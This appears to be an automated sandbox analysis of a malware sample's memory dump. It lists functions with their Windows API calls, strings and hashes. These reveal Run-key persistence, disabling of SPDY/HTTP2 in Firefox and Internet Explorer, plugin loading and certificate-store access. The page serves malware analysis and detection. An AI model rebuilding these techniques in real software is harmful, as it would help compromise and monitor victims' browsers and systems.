Opcode ID: 01268ecd8d6d738562a30964137385dca4828d46d64a21b3096fd3e49c54c794
Instruction ID: 7df0cf8171fc35df17bba04d91e707deb246803957fc146638dc39f78811af95
Opcode Fuzzy Hash: 01268ecd8d6d738562a30964137385dca4828d46d64a21b3096fd3e49c54c794
Instruction Fuzzy Hash: D44107B1D00118AFDF11AFA4CE859AEBBB9EB09348F2044AAE615B3150E7719E54CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02B8AD28, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 89registrymemorystringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 02B8AD39
GetTempPathA.KERNEL32(00000000,00000000,?,?,02B90C92,00000094,00000000,00000000), ref: 02B8AD51
RtlAllocateHeap.NTDLL(00000000,00000011), ref: 02B8AD60
GetTempPathA.KERNEL32(00000001,00000000,?,?,02B90C92,00000094,00000000,00000000), ref: 02B8AD73
GetTickCount.KERNEL32 ref: 02B8AD77
wsprintfA.USER32 ref: 02B8AD87
RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 02B8ADBB
StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 02B8ADD3
lstrlen.KERNEL32(00000000), ref: 02B8ADDD
RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 02B8ADED
RegCloseKey.ADVAPI32(?), ref: 02B8ADF9
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 02B8AE07

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 02B8ADB1
%lu.exe, xrefs: 02B8AD81

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
String ID: %lu.exe$Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 3778301466-2576086316
Opcode ID: 6435d7b46611084a1b96cd2e68427106135a64ffeb97f2fb24f808b4ad92d896
Instruction ID: a354a55e9e7c00fad1bd173b4ff64b03f4ff2efe9535a72930515ef86c06314f
Opcode Fuzzy Hash: 6435d7b46611084a1b96cd2e68427106135a64ffeb97f2fb24f808b4ad92d896
Instruction Fuzzy Hash: 71215971841219BFDB11AFA1DD88EAB7F6DEF46395B104965F909D3100EB708A61CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B71460, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 188memorystringthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8798A: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 02B879CF
Part of subcall function 02B8798A: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 02B879E7
Part of subcall function 02B8798A: WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,02B71489,02B85B4A,?,00000001), ref: 02B87AAD
Part of subcall function 02B8798A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,02B71489,02B85B4A,?,00000001), ref: 02B87AD6
Part of subcall function 02B8798A: HeapFree.KERNEL32(00000000,02B71489,?,00000000,?,?,?,?,?,02B71489,02B85B4A,?,00000001), ref: 02B87AE6
Part of subcall function 02B8798A: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,02B71489,02B85B4A,?,00000001), ref: 02B87AEF

lstrcmp.KERNEL32(?,?), ref: 02B714D7
HeapFree.KERNEL32(00000000,?), ref: 02B71503
GetCurrentThreadId.KERNEL32 ref: 02B715A9
GetCurrentThread.KERNEL32 ref: 02B715BA
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,02B85B4A,?,00000001), ref: 02B715F7
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,02B85B4A,?,00000001), ref: 02B7160B
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 02B71619
wsprintfA.USER32 ref: 02B7162A
lstrlen.KERNEL32(00000000,00000000), ref: 02B71635

Part of subcall function 02B8ECB1: lstrlen.KERNEL32(?,00000000,02B96C86,76D25520,02B74BBD,?,?,?,02B715E5,?,?,00000000,?,02B85B4A,?,00000001), ref: 02B8ECBB
Part of subcall function 02B8ECB1: lstrcpy.KERNEL32(00000000,?), ref: 02B8ECDF
Part of subcall function 02B8ECB1: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,02B715E5,?,?,00000000,?,02B85B4A,?,00000001), ref: 02B8ECE6
Part of subcall function 02B8ECB1: lstrcat.KERNEL32(00000000,00000001), ref: 02B8ED3D

HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 02B7164F
HeapFree.KERNEL32(00000000,00000000), ref: 02B71660
HeapFree.KERNEL32(00000000,?), ref: 02B7166C

Strings

DLL load status: %u, xrefs: 02B71624

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
String ID: DLL load status: %u
API String ID: 773763258-2598350583
Opcode ID: b8f1160854c418f54f6a7f08c400e00b5f1fa5b9ecc39e797d67d0957d09d5d8
Instruction ID: 07cf15735c5e4664e68b8e5c9c16800bbe76e2496357078286180f0a028a6d96
Opcode Fuzzy Hash: b8f1160854c418f54f6a7f08c400e00b5f1fa5b9ecc39e797d67d0957d09d5d8
Instruction Fuzzy Hash: F0712471D10119EFCB11EFA9D945AEEBBB9FF08384F0484A5E519A7260D7309A50DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B87F3D, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

memset.NTDLL ref: 02B87F6B
StrChrA.SHLWAPI(?,0000000D), ref: 02B87FB1
StrChrA.SHLWAPI(?,0000000A), ref: 02B87FBE
StrChrA.SHLWAPI(?,0000007C), ref: 02B87FE5
StrTrimA.SHLWAPI(?,02B9A48C), ref: 02B87FFA
StrChrA.SHLWAPI(?,0000003D), ref: 02B88003
StrTrimA.SHLWAPI(00000001,02B9A48C), ref: 02B88019
_strupr.NTDLL ref: 02B88020
StrTrimA.SHLWAPI(?,?), ref: 02B8802D
memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 02B88075
lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,02B983E4,00000002,?,?), ref: 02B88094

Strings

, xrefs: 02B88025
;, xrefs: 02B87FD3

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
String ID: $;
API String ID: 4019332941-73438061
Opcode ID: 90ae1a73d08c968362c88115cd856d135a1e3446f8342beb7291679aa865941f
Instruction ID: 45fecfbf5cd992d838f163cd5af507ee63353b8bfb174b4aeafc8b5926bac69d
Opcode Fuzzy Hash: 90ae1a73d08c968362c88115cd856d135a1e3446f8342beb7291679aa865941f
Instruction Fuzzy Hash: A241017150830A9FD720FF298C44B2BBBE9EF45344F440A9AF899D7242EB74D504CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02B8AE20, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 134stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,76D25520,?,00000000,?,?,?), ref: 02B8AE39
lstrlen.KERNEL32(?), ref: 02B8AE3F
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 02B8AE4F
lstrcpy.KERNEL32(00000000,?), ref: 02B8AE69
lstrlen.KERNEL32(?), ref: 02B8AE81
lstrlen.KERNEL32(?), ref: 02B8AE8F
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 02B8AEDD
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 02B8AF01
lstrlen.KERNEL32(?), ref: 02B8AF2F
HeapFree.KERNEL32(00000000,?,?), ref: 02B8AF5A
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 02B8AF71
HeapFree.KERNEL32(00000000,?,?), ref: 02B8AF7E

Strings

http, xrefs: 02B8AF08, 02B8AF18

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$Free$Allocatelstrcpy
String ID: http
API String ID: 904523553-2541227442
Opcode ID: 88ad57caba406c4af7403fa8ac4ff0c5554d82e281a7dafc8de1eaf4a56e55ce
Instruction ID: 5e76210e3df77464d67a5a8c8e5e9ca28e156cc4affe643dd13af03ba86d3bf5
Opcode Fuzzy Hash: 88ad57caba406c4af7403fa8ac4ff0c5554d82e281a7dafc8de1eaf4a56e55ce
Instruction Fuzzy Hash: BD4129B290024ABBDF11AFA5CC84BAE7BA9FF08354F1088A6F919D7150D7719960DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02B74393, Relevance: 21.2, APIs: 14, Instructions: 205memorystringthreadCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,02B7B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?), ref: 02B743E2
StrTrimA.SHLWAPI(00000001,20000920,?,00000000,02B7B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?,00000001), ref: 02B743FB
StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,02B7B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?), ref: 02B74406
StrTrimA.SHLWAPI(00000001,20000920,?,00000000,02B7B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?,00000001), ref: 02B7441F
lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,02B7B033,?,00000000,0000010F,00000001,00000057,?,?), ref: 02B744C8
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02B744EA
lstrcpy.KERNEL32(00000020,?), ref: 02B74509
lstrlen.KERNEL32(?,?,00000000,02B7B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?,00000001,00000000), ref: 02B74513
memcpy.NTDLL(?,?,?,?,00000000,02B7B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?,?), ref: 02B74554
memcpy.NTDLL(?,?,?,?,?,00000000,02B7B033,?,00000000,0000010F,00000001,00000057,?,?,00000000,?), ref: 02B74567
SwitchToThread.KERNEL32(00000057,00000000,?,0000010F,?,?,?,?,?,00000000,02B7B033,?,00000000,0000010F,00000001,00000057), ref: 02B7458B
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000010F,?,?,?,?,?,00000000,02B7B033,?,00000000,0000010F), ref: 02B745AA
HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,02B7B033,?,00000000,0000010F,00000001,00000057,?), ref: 02B745D0
HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,02B7B033,?,00000000,0000010F,00000001,00000057,?), ref: 02B745EC

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
String ID:
API String ID: 3323474148-0
Opcode ID: 7d30e3e014ed8f5f8dd673a31ac0a7323c0bcd524d77e3c148169dfc3edb96db
Instruction ID: d6bf1921b8d9f19c25a5c5de990f73b2254278f547882abbfe02db80653f8fc0
Opcode Fuzzy Hash: 7d30e3e014ed8f5f8dd673a31ac0a7323c0bcd524d77e3c148169dfc3edb96db
Instruction Fuzzy Hash: E2718732904301AFCB21DF24C845B5ABBF9FB48349F08496AF9A9D3250D770EA54CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02B75068, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memorystringCOMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI(?), ref: 02B75082
PathFindFileNameW.SHLWAPI(?), ref: 02B75098
lstrlenW.KERNEL32(00000000), ref: 02B750DB
RtlAllocateHeap.NTDLL(00000000,02B969FC), ref: 02B750F1
memcpy.NTDLL(00000000,00000000,02B969FA), ref: 02B75104
_wcsupr.NTDLL ref: 02B7510F
lstrlenW.KERNEL32(?,02B969FA), ref: 02B75148
RtlAllocateHeap.NTDLL(00000000,?,02B969FA), ref: 02B7515D
lstrcpyW.KERNEL32(00000000,?), ref: 02B75173
lstrcatW.KERNEL32(00000000, --use-spdy=off --disable-http2), ref: 02B75191
HeapFree.KERNEL32(00000000,00000000), ref: 02B751A0

Strings

--use-spdy=off --disable-http2, xrefs: 02B7518B

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
String ID: --use-spdy=off --disable-http2
API String ID: 3868788785-3215622688
Opcode ID: fa53b323b3dc1649a280fbf26c404f158d03b72833085405b2656a0e09547812
Instruction ID: e980b41cb81903e761dce5543c0c0929c4ff592ec256e3a0da5c031722b1479b
Opcode Fuzzy Hash: fa53b323b3dc1649a280fbf26c404f158d03b72833085405b2656a0e09547812
Instruction Fuzzy Hash: 1C316832940215AFC7306F74DD88B6F7BA8EF46365F140E69FD61D3180DB71A8908B90

Uniqueness

Uniqueness Score: -1.00%

Function 02B8BDEF, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 114memorythreadstringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 02B8BE13
GetCurrentThreadId.KERNEL32 ref: 02B8BE29
GetCurrentThread.KERNEL32 ref: 02B8BE3A

Part of subcall function 02B88800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88812
Part of subcall function 02B88800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B8882B
Part of subcall function 02B88800: GetCurrentThreadId.KERNEL32 ref: 02B88838
Part of subcall function 02B88800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88844
Part of subcall function 02B88800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88852
Part of subcall function 02B88800: lstrcpy.KERNEL32(00000000), ref: 02B88874

Part of subcall function 02B781A5: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,02B8BE81,00000020,00000000,?,00000000), ref: 02B78210
Part of subcall function 02B781A5: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,02B8BE81,00000020,00000000,?,00000000), ref: 02B78238

HeapFree.KERNEL32(00000000,?,00000020,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 02B8BEAF
HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 02B8BEBF
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 02B8BF0B
wsprintfA.USER32 ref: 02B8BF1C
lstrlen.KERNEL32(00000000,00000000), ref: 02B8BF27
HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 02B8BF41

Strings

PluginRegisterCallbacks, xrefs: 02B8BECB
DLL load status: %u, xrefs: 02B8BF16
W, xrefs: 02B8BEF8

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
String ID: DLL load status: %u$PluginRegisterCallbacks$W
API String ID: 630447368-2893651616
Opcode ID: 4fdcd70ad56021cbe12ade70f2f490858395809fc704f72c31d328cc3a2d4827
Instruction ID: 6ac1159bcab489f876fb22e248e57ce4e17cf71666f2c3f852dbeef786347489
Opcode Fuzzy Hash: 4fdcd70ad56021cbe12ade70f2f490858395809fc704f72c31d328cc3a2d4827
Instruction Fuzzy Hash: 08418C31941209FFDB11BFA2DD48AAFBFB9FF05389B104895F909D2210D7309660DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B94CD0, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 02B94CEC

Part of subcall function 02B8E55A: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,80000001,?,?,?,?,02B94D11,00000000,00000000,00000000), ref: 02B8E581
Part of subcall function 02B8E55A: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,02B94D11,00000000,00000000,00000000), ref: 02B8E5AA
Part of subcall function 02B8E55A: RegCloseKey.ADVAPI32(?,?,?,02B94D11,00000000,00000000,00000000,00000000), ref: 02B8E5E1

lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 02B94D24
lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02B94D35
RegCreateKeyA.ADVAPI32(80000001,54464F53,?), ref: 02B94D70
RegSetValueExA.ADVAPI32(00000000,72617453,00000000,00000004,?,00000004), ref: 02B94D92
RegCloseKey.ADVAPI32(?), ref: 02B94D9B
RtlEnterCriticalSection.NTDLL(00000000), ref: 02B94DB1
HeapFree.KERNEL32(00000000,?), ref: 02B94DC6
RtlLeaveCriticalSection.NTDLL(00000000), ref: 02B94DD6
HeapFree.KERNEL32(00000000,?), ref: 02B94DEB
RegCloseKey.ADVAPI32(?), ref: 02B94DF0

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 02B94CDC

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CloseValue$CriticalFreeHeapQuerySection$CreateEnterLeaveOpenlstrcmpilstrlen
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 3028791806-1428018034
Opcode ID: bac414d673089872eeb4d49bdd7e2e388df93811d1632ce7c8b71ec3fb063abd
Instruction ID: d5e716aef7f04806d2fd1691b2cde58790aa4a7195649b0d3907a101e570b2c2
Opcode Fuzzy Hash: bac414d673089872eeb4d49bdd7e2e388df93811d1632ce7c8b71ec3fb063abd
Instruction Fuzzy Hash: 43313475940109FFCF11AF99DD48EAEBBBAEF44388B1088A6F504E3020D7319A65DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02B84C88, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 78memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 02B84C9F
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,02B90E25,00000094,00000000,00000001,00000094,00000000,00000000,02B745A1,00000000,00000094,00000000), ref: 02B84CB1
StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,02B90E25,00000094,00000000,00000001,00000094,00000000,00000000,02B745A1,00000000,00000094,00000000), ref: 02B84CBE
wsprintfA.USER32 ref: 02B84CD2
CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000,02B745A1,00000000,00000094,00000000), ref: 02B84CE8
GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 02B84D01
WriteFile.KERNEL32(00000000,00000000), ref: 02B84D09
GetLastError.KERNEL32 ref: 02B84D17
CloseHandle.KERNEL32(00000000), ref: 02B84D20
GetLastError.KERNEL32(?,00000000,?,02B90E25,00000094,00000000,00000001,00000094,00000000,00000000,02B745A1,00000000,00000094,00000000), ref: 02B84D31
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,02B90E25,00000094,00000000,00000001,00000094,00000000,00000000,02B745A1,00000000,00000094,00000000), ref: 02B84D41

Strings

\\.\%s, xrefs: 02B84CCC

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
String ID: \\.\%s
API String ID: 3873609385-869905501
Opcode ID: 3370d82e51d5d898df3aca484ccd767f75c824b919a712b837ca784438aed650
Instruction ID: e9b47a1d5177a2ce8c1838cbd968401380f1197e8e48ea4c87118aa7dd474bcc
Opcode Fuzzy Hash: 3370d82e51d5d898df3aca484ccd767f75c824b919a712b837ca784438aed650
Instruction Fuzzy Hash: EE11E6715802157FE2213B75AD8CF7B3A6CEB436E9F000AA4F94AD3140FB610C61C671

Uniqueness

Uniqueness Score: -1.00%

Function 02B923B3, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 65filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B88800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88812
Part of subcall function 02B88800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B8882B
Part of subcall function 02B88800: GetCurrentThreadId.KERNEL32 ref: 02B88838
Part of subcall function 02B88800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88844
Part of subcall function 02B88800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02B8BE68,00000000,?,00000000,00000000,?), ref: 02B88852
Part of subcall function 02B88800: lstrcpy.KERNEL32(00000000), ref: 02B88874

DeleteFileA.KERNEL32(00000000,000004D2), ref: 02B923D6
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02B923DF
GetLastError.KERNEL32 ref: 02B923E9
HeapFree.KERNEL32(00000000,00000000), ref: 02B9246D

Strings

TrustedPeople, xrefs: 02B92436
Disallowed, xrefs: 02B92420
CertificateAuthority, xrefs: 02B92415
AuthRoot, xrefs: 02B9240A
Root, xrefs: 02B9242B
AddressBook, xrefs: 02B923FF
TrustedPublisher, xrefs: 02B92441

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
String ID: AddressBook$AuthRoot$CertificateAuthority$Disallowed$Root$TrustedPeople$TrustedPublisher
API String ID: 3543646443-3095660563
Opcode ID: b992d53918b13e3f26a1ab6855eacd3f5fc52c36f038559364db5edd6c6ab4f5
Instruction ID: 66db4c87eb0b449490b8760095a8d7f3d98189964cf0f636d46dc309af59fa46
Opcode Fuzzy Hash: b992d53918b13e3f26a1ab6855eacd3f5fc52c36f038559364db5edd6c6ab4f5
Instruction Fuzzy Hash: D8016526E8D22C76E53032B2BC0BF9F3E0DDF677A1F410991FA59A215099944610C6F6

Uniqueness

Uniqueness Score: -1.00%

Function 02B80758, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8B8FB: RtlEnterCriticalSection.NTDLL(02B9E268), ref: 02B8B903
Part of subcall function 02B8B8FB: RtlLeaveCriticalSection.NTDLL(02B9E268), ref: 02B8B918
Part of subcall function 02B8B8FB: InterlockedIncrement.KERNEL32(0000001C), ref: 02B8B931

RtlAllocateHeap.NTDLL(00000000,00000018,Blocked), ref: 02B8078E
memset.NTDLL ref: 02B8079F
lstrcmpi.KERNEL32(?,?), ref: 02B807DF
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02B80808
memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,02B7B24E), ref: 02B8081C
memset.NTDLL ref: 02B80829
memcpy.NTDLL(-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 02B80842
memcpy.NTDLL(-00000005,HIDDEN,00000007,-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 02B8085D
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,02B7B24E), ref: 02B8087A

Strings

HIDDEN, xrefs: 02B80857
Blocked, xrefs: 02B80761, 02B8088A

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
String ID: Blocked$HIDDEN
API String ID: 694413484-4010945860
Opcode ID: 0f2427f07df3330f2ec711d2170d395f76e81deee5310d5b3c4d8c9d99e7baa1
Instruction ID: 56698ba403ff68b09f67235258229d2ae5673a386cb790241cde5495616edb26
Opcode Fuzzy Hash: 0f2427f07df3330f2ec711d2170d395f76e81deee5310d5b3c4d8c9d99e7baa1
Instruction Fuzzy Hash: BF41A175E40209EFDB10BFA5CD84B9DBBB5FF04394F1448A9E419A7250D730AA59CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B8A098, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116registrysynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 02B888D9
Part of subcall function 02B8888D: lstrlenW.KERNEL32(?,?,00000000), ref: 02B888E5
Part of subcall function 02B8888D: memset.NTDLL ref: 02B8892D
Part of subcall function 02B8888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 02B88948
Part of subcall function 02B8888D: lstrlenW.KERNEL32(0000002C), ref: 02B88980
Part of subcall function 02B8888D: lstrlenW.KERNEL32(?), ref: 02B88988
Part of subcall function 02B8888D: memset.NTDLL ref: 02B889AB
Part of subcall function 02B8888D: wcscpy.NTDLL ref: 02B889BD

WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles,prefs.js,?,00000000,00000000,00000001), ref: 02B8A12B
RegOpenKeyA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,?), ref: 02B8A15A
RegSetValueExA.ADVAPI32(?,EnableSPDY3_0,00000000,00000004,00000000,00000004), ref: 02B8A176
RegCloseKey.ADVAPI32(?), ref: 02B8A17F
WaitForSingleObject.KERNEL32(00000000), ref: 02B8A1C2
RtlExitUserThread.NTDLL(?), ref: 02B8A1F8

Part of subcall function 02B77365: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,76D25520,?,?,02B81386,00000000,?,?), ref: 02B77383
Part of subcall function 02B77365: GetFileSize.KERNEL32(00000000,00000000,?,?,02B81386,00000000,?,?,?,?,00000000,02B71589,?,00000000,?,02B85B4A), ref: 02B77393
Part of subcall function 02B77365: CloseHandle.KERNEL32(000000FF,?,?,02B81386,00000000,?,?,?,?,00000000,02B71589,?,00000000,?,02B85B4A,?), ref: 02B773F5

Part of subcall function 02B84241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,02B81ED8), ref: 02B84282
Part of subcall function 02B84241: GetLastError.KERNEL32 ref: 02B8428C
Part of subcall function 02B84241: WaitForSingleObject.KERNEL32(000000C8), ref: 02B842B1
Part of subcall function 02B84241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 02B842D2
Part of subcall function 02B84241: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 02B842FA
Part of subcall function 02B84241: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 02B8430F
Part of subcall function 02B84241: SetEndOfFile.KERNEL32(00000006), ref: 02B8431C
Part of subcall function 02B84241: CloseHandle.KERNEL32(00000006), ref: 02B84334

Strings

EnableSPDY3_0, xrefs: 02B8A16E
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 02B8A150
prefs.js, xrefs: 02B8A0B0
user_pref("network.http.spdy.enabled", false);, xrefs: 02B8A0E3, 02B8A0F9
%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 02B8A0B5

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserValueWritewcscpy
String ID: user_pref("network.http.spdy.enabled", false);$%APPDATA%\Mozilla\Firefox\Profiles$EnableSPDY3_0$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings$prefs.js
API String ID: 90276831-3405794569
Opcode ID: 89aa9d43f264416621af3f0ee8c4e48e7ce18f170bcf5bef9d4cf0d4dc86b38a
Instruction ID: f41044c24fdddc34a95bf8330108aa5e0f169f97f85cff107cd5b501acf4a092
Opcode Fuzzy Hash: 89aa9d43f264416621af3f0ee8c4e48e7ce18f170bcf5bef9d4cf0d4dc86b38a
